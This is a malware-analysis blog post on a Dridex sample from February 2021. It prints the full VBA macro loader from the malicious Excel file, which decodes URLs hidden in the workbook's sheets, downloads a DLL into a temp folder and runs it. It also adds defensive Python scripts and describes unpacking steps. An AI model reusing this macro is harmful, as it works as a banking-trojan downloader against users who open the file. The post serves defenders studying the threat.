Dridex Malware Analysis [10 Feb 2021]

Dridex, also known as Bugat and Cridex, is a banking trojan and infostealer operated by a criminal group referred to as “Indrik Spider”. Dridex specializes in stealing banking credentials via systems that use macros from Microsoft Office products such as Word and Excel. In previously recorded incidents, the threat actors have used Dridex to hit high-value targets with ransomware [2].

This post reports the extracted code, URLs and other findings from the latest Dridex sample, detected on 10 Feb 2021. The sample was reported by the security researcher Moto_Sato. The threat actor used techniques and procedures similar to those discussed in the previous posts:

  1. Dridex-malware-analysis [1 Feb 2021]
  2. Dridex-malware-analysis [8 Feb 2021]

This post is a skim analysis and overview of the latest sample. For further steps and methods, see the posts above.

[Figure 1] VT Prior Analysis
| File Name | SHA256 | File Size | Detected AVs |
|---|---|---|---|
| INV-6291941768.xlsm | 176eaf6e286fc4dae986a46d712f92ab08ca051ab4cbd70db9e15cc4ebfc7815 | 79.77 KB | 12/65 |
| ujewngbg.dll | 1468c3d62d7cde7ef475bebf87a3e696b456a1973f91f596d6f508b0c0f3cd38 | 989.00 KB | 7/67 |
| fixed.bin | 2cceb29cebee08b9cf8cc02c370dec6440633f4b2da1f44db68998be84f1cb42 | 1.05 MB | 32/70 |
[Table 1] Files General Properties from VT

Threat Overview of Dridex

Based on the latest sample analysis and reports, the threat actor uses a VBA macro loader with clear-text functions in order to bypass detection by AV [3].

[Figure 2] Overview of Dridex from HP Threat Research Report

Malware Analysis

  1. Excel File

The XLSM file has four hidden sheets with white-colored characters, and its VBA macro is locked with EvilClippy.

[Figure 3] XLSM file
Macro VBA functions
#If VBA7 And Win64 Then
    Private Declare PtrSafe Function next_for_and Lib "urlmon" _
      Alias "URLDownloadToFileA" ( _
        ByVal pCaller As LongPtr, _
        ByVal szURL As String, _
        ByVal szFileName As String, _
        ByVal dwReserved As LongPtr, _
        ByVal lpfnCB As LongPtr _
      ) As Long
#Else
    Private Declare Function next_for_and Lib "urlmon" _
      Alias "URLDownloadToFileA" ( _
        ByVal pCaller As Long, _
        ByVal szURL As String, _
        ByVal szFileName As String, _
        ByVal dwReserved As Long, _
        ByVal lpfnCB As Long _
      ) As Long
#End If



Function marball_a(ook As String, jo As Integer)
marball_a = Mid(ook, jo, onn)
End Function

Function bussy_order(asd As Variant) As String
Randomize: ii = 2 - onn: bussy_order = asd(Int((UBound(asd) + ii) * Rnd))
End Function
Sub fill_lines_u()
parcking_list = Split(RTrim(level_recharge), refreshPage(")"))
Sheets(onn).Cells(3, onn).Name = "ms_" & "excel"
mounthYYa = Split(parcking_list(1), refreshPage("+"))
For re = 0 To UBound(mounthYYa) - LBound(mounthYYa) + onn
On Error Resume Next
Sheets(onn).Cells(3, onn).value = "=" & mounthYYa(re)
fd = Len(po & ("" & (((((Run("" & "ms_" & "" & "excel"))))))))
If re = 12 Then refas = sheetsAGT:
If re = 14 Then
add2020 = sheetsAGT
next_for_and 0, Fuel_add(bussy_order(Split(parcking_list(0), refreshPage("H") & "h"))), refas & "\" & add2020, 0, 0
End If
Next
End Sub
Function sheetsAGT()
sheetsAGT = Sheets(onn).Range("C2:C8").SpecialCells(xlCellTypeConstants)
End Function
Public Function Fuel_add(y As String)
Fuel_add = Right(y, Len(y) - onn)
End Function
Function level_recharge()
Dim pockets_two As String
Dim chat_1_r As String: Dim swift_pay As String
Dim u As Integer: pockets_two = Nill_first(5)
chat_1_r = Nill_first(4): swift_pay = Nill_first(3)
For u = onn To Len(pockets_two)
empty_u = empty_u & marball_a(pockets_two, u) & marball_a(chat_1_r, u) & marball_a(swift_pay, u)
Next
level_recharge = RTrim(empty_u)
End Function
Function Nill_first(rt As Integer)
For Each Q In Sheets(rt).UsedRange.SpecialCells(xlCellTypeConstants): table_last = table_last & Q: Nill_first = table_last
Next
End Function

Function po()
po = "Z"
End Function
Function onn()
onn = 1
End Function
Function refreshPage(u As String)
refreshPage = Replace(String(4, po), po, u)
End Function

The character values are hidden across the sheets in order. Together they form a list of 50+ URLs, and the malicious DLL is loaded from one of them. The full list of URLs is in Appendix A.
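The decoding that level_recharge and fill_lines_u perform on the hidden sheets can be reproduced statically, so the URL list can be recovered without running the macro. This is an added example, not code from the sample or from the original post: the Python function names and the sample strings are constructed for illustration, while the separators, the interleaving and the dropped leading character follow the macro above.

```python
import re

URL_SEP = "H" * 4 + "h"      # refreshPage("H") & "h" in the macro
PART_SEP = ")" * 4           # refreshPage(")")
FORMULA_SEP = "+" * 4        # refreshPage("+")


def interleave(*streams):
    """Mirror level_recharge(): take one character from each sheet in turn."""
    out = []
    for i in range(len(streams[0])):   # the macro loops over the first sheet's length
        for s in streams:              # order in the macro: sheets 5, 4, 3
            out.append(s[i:i + 1])     # like Mid(), a slice past the end yields ""
    return "".join(out).rstrip()


def decode(streams):
    """Return (urls, formulas) recovered from the per-sheet strings."""
    parts = interleave(*streams).split(PART_SEP)
    urls = [chunk[1:] for chunk in parts[0].split(URL_SEP)]  # Fuel_add() drops char 1
    formulas = parts[1].split(FORMULA_SEP) if len(parts) > 1 else []
    return urls, formulas


def defang(url):
    """Make a URL safe to paste into a report (hxxp, [.])."""
    return re.sub(r"^http", "hxxp", url).replace(".", "[.]")


def split_streams(plain, n=3):
    """Helper for the constructed sample: deal characters out into n sheet strings."""
    plain += " " * (-len(plain) % n)
    return [plain[i::n] for i in range(n)]


# Constructed sample, not data from the analysed workbook.
SAMPLE = ("qhttps://a.example/one.rar" + URL_SEP + "zhttps://b.example/two.zip"
          + PART_SEP + "FORMULA_A()" + FORMULA_SEP + "FORMULA_B()")

if __name__ == "__main__":
    urls, formulas = decode(split_streams(SAMPLE))
    print([defang(u) for u in urls], formulas)
```

To use it on a real workbook, pass the concatenated constant cells of the three sheets in the order the macro reads them.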

After a random URL is picked from the list, the final call locates the path to load from, “%TEMP%”, and the process “regsvr32.exe”. The process keeps running even after the Excel file is closed.

[Figure 4] Dynamic Analysis

  2. DLL File

The threat actor seems to use a different tool or technique each time to pack the same DLL file seen in the previously analyzed samples [9][10]. However, the overall procedure to reverse engineer this part is the same. The DLL works by self-injection.

[Figure 5] Pestudio overview of DLL file
[Figure 6] Entropy from DetectItEasy

Even though none of the tools, such as DetectItEasy (DiE), detects the method used to pack the malicious file, it is clear enough that something is hidden.

Self-injection is the method the threat actor has been using so far, and it makes it simple for the analyst to extract the packed file: setting breakpoints on <VirtualAlloc> and <VirtualProtect> in x32dbg is the way to go.

The loaded hidden stub contains what looks like clear-text PowerShell usage. This is there only to confuse the reverse engineering process: PowerShell does not seem to be used at this point or when the malicious file is run dynamically. In this example the stub code is loaded at <009F0000>.

[Figure 7] BreakPoints at hidden code

After that, the “packed”, or in better terms the “overwritten”, executable is run in memory at the same location where it was first loaded in x32dbg, and the dump can be saved from memory. Because it comes from memory, the raw addresses need to be fixed using PE-bear or CFF Explorer.

[Figure 8] The overwritten binary with PE header
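The raw-address fix can also be scripted. The following is an added example, not the author's tooling: it assumes the dump is a full image copied from memory, so each section's bytes sit at its RVA, and it runs on a constructed header rather than on the real sample.

```python
import struct


def fix_dumped_sections(dump):
    """Point each section's raw fields at its RVA; return (fixed_bytes, report)."""
    buf = bytearray(dump)
    if buf[:2] != b"MZ":
        raise ValueError("no MZ header")
    pe, = struct.unpack_from("<I", buf, 0x3C)            # e_lfanew
    if buf[pe:pe + 4] != b"PE\0\0":
        raise ValueError("no PE signature")
    nsec, = struct.unpack_from("<H", buf, pe + 6)        # NumberOfSections
    opt_size, = struct.unpack_from("<H", buf, pe + 20)   # SizeOfOptionalHeader
    table = pe + 24 + opt_size                           # first section header
    report = []
    for i in range(nsec):
        off = table + 40 * i
        name = bytes(buf[off:off + 8]).rstrip(b"\0").decode("ascii", "replace")
        vsize, vaddr, rsize, rptr = struct.unpack_from("<4I", buf, off + 8)
        # Clamp to the dump so a truncated image cannot yield an out-of-file range.
        new_size = min(vsize or rsize, max(len(buf) - vaddr, 0))
        # SizeOfRawData and PointerToRawData are the two fields at offset 16.
        struct.pack_into("<2I", buf, off + 16, new_size, vaddr)
        report.append((name, rptr, vaddr, new_size))
    return bytes(buf), report


def build_sample_dump():
    """Constructed 0x3000-byte image: .text at RVA 0x1000, .data at RVA 0x2000."""
    buf = bytearray(0x3000)
    buf[:2] = b"MZ"
    struct.pack_into("<I", buf, 0x3C, 0x80)
    buf[0x80:0x84] = b"PE\0\0"
    struct.pack_into("<HH12xHH", buf, 0x84, 0x14C, 2, 0xE0, 0x2102)  # COFF header
    table = 0x80 + 24 + 0xE0
    sections = [(b".text", 0x800, 0x1000, 0x800, 0x400),   # raw pointers still hold
                (b".data", 0x200, 0x2000, 0x200, 0xC00)]   # the on-disk offsets
    for i, sec in enumerate(sections):
        struct.pack_into("<8s4I", buf, table + 40 * i, *sec)
    buf[0x1000:0x1004] = b"CODE"                           # marker at the .text RVA
    return bytes(buf)


if __name__ == "__main__":
    fixed, report = fix_dumped_sections(build_sample_dump())
    for name, old_ptr, new_ptr, size in report:
        print(f"{name}: raw 0x{old_ptr:X} -> 0x{new_ptr:X}, size 0x{size:X}")
```

The sizes written here are not rounded to the file alignment, which static tools tolerate.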

The fixed, dumped binary has been submitted to VT and AnyRun. It seems to be the exact same DLL that was dumped in the previous analysis, with a little overhead of misleading code.

[Figure 9] Pestudio of dumped file

Appendix A

DO NOT run any of below URLs

References

[1] Indrik Spider, https://malpedia.caad.fkie.fraunhofer.de/actor/indrik_spider

[2] Big Game Hunting: The Evolution of INDRIK SPIDER From Dridex Wire Fraud to BitPaymer Targeted Ransomware, https://www.crowdstrike.com/blog/big-game-hunting-the-evolution-of-indrik-spider-from-dridex-wire-fraud-to-bitpaymer-targeted-ransomware/

[3] Dridex Malicious Document Analysis: Automating the Extraction of Payload URLs, https://threatresearch.ext.hp.com/dridex-malicious-document-analysis-automating-the-extraction-of-payload-urls/

[4] Excel file from AnyRun, https://app.any.run/tasks/3d132db7-78d1-40bb-8b9f-86d9049a1107/#

[5] Excel File in VT, https://www.virustotal.com/gui/file/176eaf6e286fc4dae986a46d712f92ab08ca051ab4cbd70db9e15cc4ebfc7815/details

[6] DLL file in VT, https://www.virustotal.com/gui/file/1468c3d62d7cde7ef475bebf87a3e696b456a1973f91f596d6f508b0c0f3cd38/detection

[7] Unpacked file submitted to VT, https://www.virustotal.com/gui/file/2cceb29cebee08b9cf8cc02c370dec6440633f4b2da1f44db68998be84f1cb42/details

[8] Unpacked file submitted to AnyRun, https://app.any.run/tasks/8f8f954d-6c3c-415d-a9ff-fd0a50209afd

[9] Dridex-malware-analysis [1 Feb 2021]

[10] Dridex-malware-analysis [8 Feb 2021]

Article Link: https://aaqeel01.wordpress.com/2021/02/10/dridex-malware-analysis-10-feb-2021/